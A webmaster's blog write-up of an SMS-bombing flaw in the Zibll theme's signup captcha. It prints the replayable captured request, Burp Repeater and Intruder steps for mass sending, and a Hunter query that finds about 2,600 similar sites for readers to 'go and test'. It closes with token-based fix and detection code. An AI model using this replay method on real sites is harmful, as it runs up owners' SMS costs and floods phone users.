Record of the SMS-interface abuse vulnerability on the Zhutou (猪头) site

Author: FancyPig | Published: | Updated:

Miscellany

Woke up in the middle of the night to an SMS alert from Alibaba Cloud.

Could my little site, with only 5-6k daily active users, really have been targeted by the black-market crowd? I remembered that SMS registration is protected by a slider captcha.

Could it be that there is a vulnerability in it?

Reproducing the vulnerability

Linked post: 【零基础学渗透】工具篇——BurpSuite (Penetration testing from scratch, tools: BurpSuite), by Sec-Labs.

Open Burp Suite and turn on interception; you should see "Intercept is on".

Open a registration page, enter a phone number and click the button to request a verification code.

The image slider captcha then appears; drag the slider to complete it, then capture the request.

The captured payload is shown below. The parameter that matters is email_phone=, followed by the phone number:

name=&email_phone=你的手机号&captch=&captcha_type=email_phone&password2=&action=signup_captcha&slidercaptcha%5Bspliced%5D=true&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=3&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D=2&slidercaptcha%5Btrail%5D%5B%5D
=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=1&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha
%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-2&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrail%5D%5B%5D=-3&slidercaptcha%5Btrai
l%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-4&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-5&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-6&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-7&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=-8&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=0&slidercaptcha%5Btr
ail%5D%5B%5D=0&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Btrail%5D%5B%5D=-1&slidercaptcha%5Bverified%5D=true

Now let's test whether this captcha result can be reused: right-click and choose Send to Repeater.

Then see whether the number can be changed and the packet resent. I changed it to another phone number and clicked Send.

It went through.

I checked my phone, and the code had indeed arrived.

So how do the black-market operators turn this vulnerability into SMS bombing?

They have large proxy pools; hammering the interface we just saw is all it takes for so-called SMS bombing...
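The proxy pools are exactly what makes per-IP throttling useless, but the abuse is still visible in the server's own logs if you count what is being targeted rather than who is asking. The following Python is an added example, not code from the original post or from the Zibll theme; the log format and the sample lines are constructed, and the field names (signup_captcha, email_phone) mirror the captured request above. It contrasts what an IP-only limiter sees (at most one request per address) with a site-wide count of distinct phone numbers per sliding window:

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime

# Constructed application log (not taken from the post): "<iso-time> <client-ip> <action> <email_phone>".
# 25 requests arrive within 25 seconds, each from a different proxy address and
# each asking for a code to a different number, followed by one ordinary signup later.
SAMPLE_LOG = "\n".join(
    f"2022-06-01T02:10:{i:02d} 203.0.113.{i} signup_captcha 1380000{i:04d}"
    for i in range(25)
) + "\n2022-06-01T02:15:00 198.51.100.7 signup_captcha 13900001234\n"

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def parse_log(text):
    """Return (timestamp, ip, phone) tuples for SMS-code requests, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, ip, action, phone = m.groups()
        if action != "signup_captcha":
            continue
        events.append((datetime.fromisoformat(ts), ip, phone))
    events.sort()
    return events


def per_ip_peak(events, window_seconds=60):
    """Largest number of requests any single IP made inside one window: this is
    all an IP-only rate limiter can see, and a proxy pool keeps it at 1."""
    peak = 0
    recent_by_ip = defaultdict(deque)
    for ts, ip, _ in events:
        q = recent_by_ip[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        peak = max(peak, len(q))
    return peak


def distinct_phone_alerts(events, window_seconds=60, threshold=20):
    """Raise an alert each time the number of distinct phone numbers requested
    site-wide within the sliding window first exceeds the threshold, regardless
    of which addresses sent the requests. Returns [(timestamp, distinct_count)]."""
    recent = deque()          # (timestamp, phone) pairs still inside the window
    live = Counter()          # phone -> occurrences inside the window
    alerts, alerting = [], False
    for ts, _, phone in events:
        recent.append((ts, phone))
        live[phone] += 1
        while (ts - recent[0][0]).total_seconds() > window_seconds:
            _, old = recent.popleft()
            live[old] -= 1
            if live[old] == 0:
                del live[old]
        if len(live) > threshold:
            if not alerting:
                alerts.append((ts, len(live)))
                alerting = True
        else:
            alerting = False
    return alerts


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("per-IP peak:", per_ip_peak(evs))                # 1: the proxy pool hides the burst
    print("site-wide alerts:", distinct_phone_alerts(evs))  # fires at 02:10:20 with 21 numbers
```

The threshold and window are tuning knobs: a site with 5-6k daily users will rarely see more than a handful of genuinely new numbers per minute, so a site-wide distinct-number count is a far better alarm than anything keyed on the client address.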

Here we'll also give a brief walkthrough: the same thing can be achieved indirectly with Burp Suite's brute-force mode (Intruder).

Send the packet we just captured to the Intruder module: click Send to Intruder.

First click Clear to remove the unneeded positions.

Then select the phone number as the variable and click Add §; it wraps your phone number in § markers on both sides.

Then, under Payloads, import arbitrary phone numbers; you can generate some random ones yourself.

We generated 100 at random.

Then click Load to import them.

Then click Start attack, and the messages get fired off like crazy: at four fen each, piggy is in tears.

Then you just watch the messages being burned through one after another...

Live record

Because piggy's site runs the Zibll theme, many fellow webmasters have also said it is really painful.

The one in the video looks pretty miserable.

How to find other webmasters with the same interface

We can refer to the earlier article:

Linked post: 免费网络空间测绘平台 奇安信Hunter——鹰图平台 (Free cyberspace mapping platform: Qi An Xin Hunter), by FancyPig.

Here we use Qi An Xin's Hunter platform; first grab the site's icon.

Then upload it.

Click OK and the search runs.

Hunter only turned up 5 assets here.

The icon search doesn't seem to work well, so let's switch to another query:

web.body="子比"

This one returns far more: over 2,600 assets.

Then you can go and test: do the sites in there have the same vulnerability as mine?

How to fix the vulnerability

For the fix, I recommend token-based verification: the server generates a token, and every request to the SMS interface must pass a token check; if the token is wrong, no SMS is sent. Verifying the source IP alone is almost useless as a strategy!
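As an added example (not the post's or the theme's own code), here is one way to implement the token scheme the fix describes, written in Python so the checks can be run offline; the server secret, the token layout and the in-memory consumed-nonce set are assumptions, and a real deployment would keep the nonce store in Redis or the database. The token is issued only after the captcha has been validated on the server, is HMAC-signed, bound to the phone number it was issued for, expires, and can be spent once, so the Repeater experiment from the post (same captcha result, different email_phone) is rejected:

```python
import base64
import hashlib
import hmac
import json
import secrets
import time


class SmsTokenGate:
    """Hands out a single-use, short-lived token once the slider captcha has been
    validated on the server, and sends an SMS only when a valid token for *that*
    phone number is presented.  The consumed-nonce set is in memory here
    (assumption); a real deployment would keep it in Redis or the database."""

    def __init__(self, secret: bytes, ttl_seconds: int = 120, now=time.time):
        self._secret = secret          # per-deployment secret, never sent to the client
        self._ttl = ttl_seconds
        self._now = now                # injectable clock so expiry can be exercised
        self._consumed = set()

    def issue_token(self, phone: str) -> str:
        # Call this only after the captcha has been checked server-side: the
        # client-supplied slidercaptcha[verified]=true field must not be trusted.
        claims = {"phone": phone, "nonce": secrets.token_hex(16),
                  "exp": int(self._now()) + self._ttl}
        body = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
        sig = hmac.new(self._secret, body.encode(), hashlib.sha256).hexdigest()
        return f"{body}.{sig}"

    def send_sms(self, phone: str, token: str):
        """Return (ok, reason); every rejection reason is one of the checks the fix needs."""
        body, _, sig = token.partition(".")
        expected = hmac.new(self._secret, body.encode(), hashlib.sha256).hexdigest()
        if not sig or not hmac.compare_digest(expected, sig):
            return False, "bad-signature"      # forged or tampered token
        claims = json.loads(base64.urlsafe_b64decode(body))
        if claims["exp"] < self._now():
            return False, "expired"            # captcha solve is too old
        if claims["phone"] != phone:
            return False, "phone-mismatch"     # token was issued for another number
        if claims["nonce"] in self._consumed:
            return False, "replayed"           # one captcha solve, one SMS
        self._consumed.add(claims["nonce"])
        # hand the message to the SMS provider here
        return True, "sent"


def replay_scenario():
    """Re-run the post's Repeater experiment against the gate: one captcha solve,
    then the same token for the same number, for a different number, tampered,
    and after expiry.  Returns the five reasons in that order."""
    clock = [1_000_000]                      # fake clock, advanced by hand
    gate = SmsTokenGate(secrets.token_bytes(32), ttl_seconds=120, now=lambda: clock[0])
    token = gate.issue_token("13800000001")  # constructed number
    reasons = [
        gate.send_sms("13800000001", token)[1],  # legitimate first use
        gate.send_sms("13800000001", token)[1],  # same packet resent
        gate.send_sms("13900000002", token)[1],  # email_phone edited, as in the post
    ]
    body, _, sig = token.partition(".")
    tampered = f"{body}.{sig[:-1]}{'0' if sig[-1] != '0' else '1'}"
    reasons.append(gate.send_sms("13800000001", tampered)[1])
    fresh = gate.issue_token("13800000001")
    clock[0] += 121                          # step past the 120 s lifetime
    reasons.append(gate.send_sms("13800000001", fresh)[1])
    return reasons


if __name__ == "__main__":
    print(replay_scenario())  # ['sent', 'replayed', 'phone-mismatch', 'bad-signature', 'expired']
```

Binding the token to the phone number is the check that closes the hole shown in the Repeater step; the single-use nonce closes the Intruder variant, since each SMS then costs the attacker a fresh captcha solve rather than a fresh proxy.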

Tags: SMS bombing, SMS interface, SMS fraud, SMS abuse, SMS vulnerability, SMS stress-testing, SMS interface abuse